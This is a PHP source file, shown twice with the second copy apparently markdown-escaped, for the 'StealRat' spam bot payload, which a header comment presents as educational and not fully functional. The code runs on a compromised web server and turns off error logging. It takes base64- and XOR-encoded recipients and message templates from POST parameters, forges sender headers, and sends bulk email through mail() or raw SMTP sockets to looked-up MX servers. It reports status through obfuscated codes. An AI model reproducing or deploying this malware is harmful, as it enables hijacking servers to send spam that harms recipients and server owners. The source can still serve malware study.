elektret/stealrat.php

## stealrat.php
<?php

/* STEALRAT SPAM BOT
 * PHP PAYLOAD
 *
 * Not tested, not fully functional.
 * Published for educational purpose only.
 */

@error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);

if (count($_POST) < 2)
  die(PHP_OS . chr(49) . chr(48) . chr(43) . md5(0987654321));

$is_decoded = false;
foreach(array_keys($_POST) as $key) {
  switch($key[0]) {
    case chr(108): $recipient = $key; break;
    case chr(100): $payload = $key; break;
    case chr(109): $address = $key; break;
    case chr(101); $is_decoded = true; break;
  }
}

if($recipient === '' || $payload === '')
  die(PHP_OS . chr(49) . chr(49) . chr(43) . md5(0987654321));

$config = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));

$recipient = @$_POST[$recipient];
$payload = @$_POST[$payload];
$address = @$_POST[$address];

if($is_decoded) {
  $recipient = decode($recipient);
  $payload = decode($payload);
  $address = decode($address);
}

$recipient = urldecode(stripslashes($recipient));
$payload = urldecode(stripslashes($payload));
$address = urldecode(stripslashes($address));

if(strpos($recipient, ';', 1) != false) {
  list($pos1, $pos2, $pos3) = preg_split('/;/', strtolower($recipient));
  $pos1 = ucfirst($pos1);
  $pos2 = ucfirst($pos2);
  $recipient = next(explode('@', $pos3));

  if($pos2 == '' || $pos1 == '') {
    $pos2 = $pos1 = '';
    $recipient = $pos3;
  } else $recipient = "\"$pos1 $pos2\"<$pos3>";

} else {
  $pos2 = $pos1 = '';
  $pos3 = strtolower($recipient);
  $recipient = next(explode('@', $recipient));
}

preg_match("|<USER>(.*)</USER>|imsU", $payload, $user);
$user = $user[1];
preg_match("|<NAME>(.*)</NAME>|imsU", $payload, $name);
$name = $name[1];
preg_match("|<SUBJ>(.*)</SUBJ>|imsU", $payload, $subject);
$subject = $subject[1];
preg_match("|<SBODY>(.*)</SBODY>|imsU", $payload, $message);
$message = $message[1];

$subject = str_replace("%R_NAME%", $pos1, $subject);
$subject = str_replace("%R_LNAME%", $pos2, $subject);
$message = str_replace("%R_NAME%", $pos1, $message);
$message = str_replace("%R_LNAME%", $pos2, $message);
$domain = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);

if(validate($domain) || @ini_get('safe_mode')) $pickup = false;
else $pickup = true;

$params = "$user@$domain";

if($name != '') $sender = "$name <$params>";
else $sender = $params;

$reply = "From: $sender\r\n";
$reply .= "Reply-To: $sender\r\n";
$contenttype = "X-Priority: 3 (Normal)\r\n";
$contenttype .= "MIME-Version:1.0\r\n";
$contenttype .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n";
$contenttype .= "Content-Transfer-Encoding: 8bit\r\n";

if(!in_array('mail', $config))
{
  if($pickup)
    if(@mail($recipient, $subject, $message, $reply . $contenttype, "-f$sender"))
      die(chr(79) . chr(75) . md5(1234567890) . "+0");
  else
    if(@mail($recipient, $subject, $message, $contenttype))
      die(chr(79) . chr(75) . md5(1234567890) . "+0");
}

$header = "Date: " . @date("D, j M Y G:i:s O") . "\r\n" . $reply;
$header .= "Message-ID: <" . preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time())) . "@$domain>\r\n";
$header .= "To:$recipient\r\n";
$header .= "Subject: $subject\r\n";
$header .= $contenttype;
$email = $header . "\r\n" . $message;

if($address == '') $address = lookup($recipient);

if(($fd = open_socket($sender, $recipient, $email, $domain, $address)) == 0)
  die(chr(79) . chr(75) . md5(1234567890) . "+1");
else echo PHP_OS . chr(50) . chr(48) . '+' . md5(0987654321) . "+$fd";

function validate($domain)
{
  return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $domain);
}

/* UNKNOWN, NOT IN USE
 *
 * function na73fa8bd($str, $len = 0, $prefix = "=\r\n", $new_len = 0, $toggle = false)
 * {
 *   $size = strlen($str);
 *   $result = '';
 *   for($i = 0; $i < $size; $i++) {
 *     if($len >= 75) {
 *       $len = $new_len;
 *       $result .= $prefix;
 *     }
 *     $v4a8a08f0 = ord($str[$i]);
 *     if(($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) {
 *       if((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$toggle)) {
 *         $result .= chr($v4a8a08f0);
 * 	   $v11a95b8a = 0;
 * 	   continue;
 *       }
 *       $result .= '=' . str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT);
 *       $v11a95b8a += 3;
 *       continue;
 *     }
 *     $result .= chr($v4a8a08f0); $v11a95b8a++;
 *   }
 *   return $result;
 * }
 */

/* OPEN TCP SOCKET, PORT 25 */

function open_socket($sender, $recipient, $email, $domain, $address)
{
  global $config;

  if(!in_array('fsockopen', $config))
    $socket = @fsockopen($address, 25, $errno, $errstr,20);
  elseif(!in_array('pfsockopen', $config))
    $socket = @pfsockopen($address, 25, $errno, $errstr, 20);
  elseif(!in_array('stream_socket_client', $config) && function_exists("stream_socket_client"))
    $socket = @stream_socket_client("tcp://$address:25", $errno, $errstr, 20);
  else return -1;

  if(!$socket) return 1;
  else
  {
    $v8d777f38 = getok($socket);
    @fputs($socket, "EHLO $domain\r\n");
    $result = getok($socket);

    if(substr($result, 0, 3) != 250 )
      return "2+($recipient)+" . preg_replace('/(\r\n|\r|\n)/', '|', $result);

    @fputs($socket, "MAIL FROM:<$sender>\r\n");
    $result = getok($socket);

    if(substr($result, 0, 3) != 250 )
      return "3+($recipient)+" . preg_replace('/(\r\n|\r|\n)/', '|', $result);

    @fputs($socket, "RCPT TO:<$recipient>\r\n");
    $result = getok($socket);

    if(substr($result, 0, 3) != 250 && substr($result, 0, 3) != 251)
      return "4+($recipient)+" . preg_replace('/(\r\n|\r|\n)/', '|', $result);

    @fputs($socket, "DATA\r\n");
    $result = getok($socket);

    if(substr($result, 0, 3) != 354 )
      return "5+($recipient)+" . preg_replace('/(\r\n|\r|\n)/', '|', $result);

    @fputs($socket, $email . "\r\n.\r\n");
    $result = getok($socket);

    if(substr($result, 0, 3) != 250 )
      return "6+($recipient)+" . preg_replace('/(\r\n|\r|\n)/', '|', $result);

    @fputs($socket, "QUIT\r\n");
    @fclose($socket); return 0;
  }
}

function getok($handle)
{
  $result = '';
  while($line = @fgets($handle, 4096)) {
    $result .= $line;
    if(substr($line, 3, 1) == ' ') break;
  }
  return $result;
}

function lookup($hostname)
{
  global $config;
  if(!in_array('getmxrr', $config) && function_exists("getmxrr")) {
    @getmxrr($hostname, $mxhosts, $precedence);
    if(count($mxhosts) === 0) return '127.0.0.1';
    $position = array_keys($precedence, min($precedence));
    return $mxhosts[$position[0]];
  } else return '127.0.0.1';
}

function decode($str)
{
  $str = base64_decode($str);
  $result = '';
  for($i = 0; $i < strlen($str); $i++)
    $result .= chr(ord($str[$i]) ^ 2);
  return $result;
 }
?>
	<?php

	/* STEALRAT SPAM BOT
	* PHP PAYLOAD
	*
	* Not tested, not fully functional.
	* Published for educational purpose only.
	*/

	@error_reporting(0);
	@ini_set('error_log', NULL);
	@ini_set('log_errors', 0);

	if (count($_POST) < 2)
	die(PHP_OS . chr(49) . chr(48) . chr(43) . md5(0987654321));

	$is_decoded = false;
	foreach(array_keys($_POST) as $key) {
	switch($key[0]) {
	case chr(108): $recipient = $key; break;
	case chr(100): $payload = $key; break;
	case chr(109): $address = $key; break;
	case chr(101); $is_decoded = true; break;
	}
	}

	if($recipient === '' \|\| $payload === '')
	die(PHP_OS . chr(49) . chr(49) . chr(43) . md5(0987654321));

	$config = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));

	$recipient = @$_POST[$recipient];
	$payload = @$_POST[$payload];
	$address = @$_POST[$address];

	if($is_decoded) {
	$recipient = decode($recipient);
	$payload = decode($payload);
	$address = decode($address);
	}

	$recipient = urldecode(stripslashes($recipient));
	$payload = urldecode(stripslashes($payload));
	$address = urldecode(stripslashes($address));

	if(strpos($recipient, ';', 1) != false) {
	list($pos1, $pos2, $pos3) = preg_split('/;/', strtolower($recipient));
	$pos1 = ucfirst($pos1);
	$pos2 = ucfirst($pos2);
	$recipient = next(explode('@', $pos3));

	if($pos2 == '' \|\| $pos1 == '') {
	$pos2 = $pos1 = '';
	$recipient = $pos3;
	} else $recipient = "\"$pos1 $pos2\"<$pos3>";

	} else {
	$pos2 = $pos1 = '';
	$pos3 = strtolower($recipient);
	$recipient = next(explode('@', $recipient));
	}

	preg_match("\|<USER>(.*)</USER>\|imsU", $payload, $user);
	$user = $user[1];
	preg_match("\|<NAME>(.*)</NAME>\|imsU", $payload, $name);
	$name = $name[1];
	preg_match("\|<SUBJ>(.*)</SUBJ>\|imsU", $payload, $subject);
	$subject = $subject[1];
	preg_match("\|<SBODY>(.*)</SBODY>\|imsU", $payload, $message);
	$message = $message[1];

	$subject = str_replace("%R_NAME%", $pos1, $subject);
	$subject = str_replace("%R_LNAME%", $pos2, $subject);
	$message = str_replace("%R_NAME%", $pos1, $message);
	$message = str_replace("%R_LNAME%", $pos2, $message);
	$domain = preg_replace('/^(www\|ftp)\./i', '', @$_SERVER['HTTP_HOST']);

	if(validate($domain) \|\| @ini_get('safe_mode')) $pickup = false;
	else $pickup = true;

	$params = "$user@$domain";

	if($name != '') $sender = "$name <$params>";
	else $sender = $params;

	$reply = "From: $sender\r\n";
	$reply .= "Reply-To: $sender\r\n";
	$contenttype = "X-Priority: 3 (Normal)\r\n";
	$contenttype .= "MIME-Version:1.0\r\n";
	$contenttype .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n";
	$contenttype .= "Content-Transfer-Encoding: 8bit\r\n";

	if(!in_array('mail', $config))
	{
	if($pickup)
	if(@mail($recipient, $subject, $message, $reply . $contenttype, "-f$sender"))
	die(chr(79) . chr(75) . md5(1234567890) . "+0");
	else
	if(@mail($recipient, $subject, $message, $contenttype))
	die(chr(79) . chr(75) . md5(1234567890) . "+0");
	}

	$header = "Date: " . @date("D, j M Y G:i:s O") . "\r\n" . $reply;
	$header .= "Message-ID: <" . preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time())) . "@$domain>\r\n";
	$header .= "To:$recipient\r\n";
	$header .= "Subject: $subject\r\n";
	$header .= $contenttype;
	$email = $header . "\r\n" . $message;

	if($address == '') $address = lookup($recipient);

	if(($fd = open_socket($sender, $recipient, $email, $domain, $address)) == 0)
	die(chr(79) . chr(75) . md5(1234567890) . "+1");
	else echo PHP_OS . chr(50) . chr(48) . '+' . md5(0987654321) . "+$fd";

	function validate($domain)
	{
	return preg_match("/^([1-9]\|[1-9][0-9]\|1[0-9][0-9]\|2[0-4][0-9]\|25[0-5])(\.([0-9]\|[1-9][0-9]\|1[0-9][0-9]\|2[0-4][0-9]\|25[0-5])){3}$/", $domain);
	}

	/* UNKNOWN, NOT IN USE
	*
	* function na73fa8bd($str, $len = 0, $prefix = "=\r\n", $new_len = 0, $toggle = false)
	* {
	* $size = strlen($str);
	* $result = '';
	* for($i = 0; $i < $size; $i++) {
	* if($len >= 75) {
	* $len = $new_len;
	* $result .= $prefix;
	* }
	* $v4a8a08f0 = ord($str[$i]);
	* if(($v4a8a08f0 == 0x3d) \|\| ($v4a8a08f0 >= 0x80) \|\| ($v4a8a08f0 < 0x20)) {
	* if((($v4a8a08f0 == 0x0A) \|\| ($v4a8a08f0 == 0x0D)) && (!$toggle)) {
	* $result .= chr($v4a8a08f0);
	* $v11a95b8a = 0;
	* continue;
	* }
	* $result .= '=' . str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT);
	* $v11a95b8a += 3;
	* continue;
	* }
	* $result .= chr($v4a8a08f0); $v11a95b8a++;
	* }
	* return $result;
	* }
	*/

	/* OPEN TCP SOCKET, PORT 25 */

	function open_socket($sender, $recipient, $email, $domain, $address)
	{
	global $config;

	if(!in_array('fsockopen', $config))
	$socket = @fsockopen($address, 25, $errno, $errstr,20);
	elseif(!in_array('pfsockopen', $config))
	$socket = @pfsockopen($address, 25, $errno, $errstr, 20);
	elseif(!in_array('stream_socket_client', $config) && function_exists("stream_socket_client"))
	$socket = @stream_socket_client("tcp://$address:25", $errno, $errstr, 20);
	else return -1;

	if(!$socket) return 1;
	else
	{
	$v8d777f38 = getok($socket);
	@fputs($socket, "EHLO $domain\r\n");
	$result = getok($socket);

	if(substr($result, 0, 3) != 250 )
	return "2+($recipient)+" . preg_replace('/(\r\n\|\r\|\n)/', '\|', $result);

	@fputs($socket, "MAIL FROM:<$sender>\r\n");
	$result = getok($socket);

	if(substr($result, 0, 3) != 250 )
	return "3+($recipient)+" . preg_replace('/(\r\n\|\r\|\n)/', '\|', $result);

	@fputs($socket, "RCPT TO:<$recipient>\r\n");
	$result = getok($socket);

	if(substr($result, 0, 3) != 250 && substr($result, 0, 3) != 251)
	return "4+($recipient)+" . preg_replace('/(\r\n\|\r\|\n)/', '\|', $result);

	@fputs($socket, "DATA\r\n");
	$result = getok($socket);

	if(substr($result, 0, 3) != 354 )
	return "5+($recipient)+" . preg_replace('/(\r\n\|\r\|\n)/', '\|', $result);

	@fputs($socket, $email . "\r\n.\r\n");
	$result = getok($socket);

	if(substr($result, 0, 3) != 250 )
	return "6+($recipient)+" . preg_replace('/(\r\n\|\r\|\n)/', '\|', $result);

	@fputs($socket, "QUIT\r\n");
	@fclose($socket); return 0;
	}
	}

	function getok($handle)
	{
	$result = '';
	while($line = @fgets($handle, 4096)) {
	$result .= $line;
	if(substr($line, 3, 1) == ' ') break;
	}
	return $result;
	}

	function lookup($hostname)
	{
	global $config;
	if(!in_array('getmxrr', $config) && function_exists("getmxrr")) {
	@getmxrr($hostname, $mxhosts, $precedence);
	if(count($mxhosts) === 0) return '127.0.0.1';
	$position = array_keys($precedence, min($precedence));
	return $mxhosts[$position[0]];
	} else return '127.0.0.1';
	}

	function decode($str)
	{
	$str = base64_decode($str);
	$result = '';
	for($i = 0; $i < strlen($str); $i++)
	$result .= chr(ord($str[$i]) ^ 2);
	return $result;
	}
	?>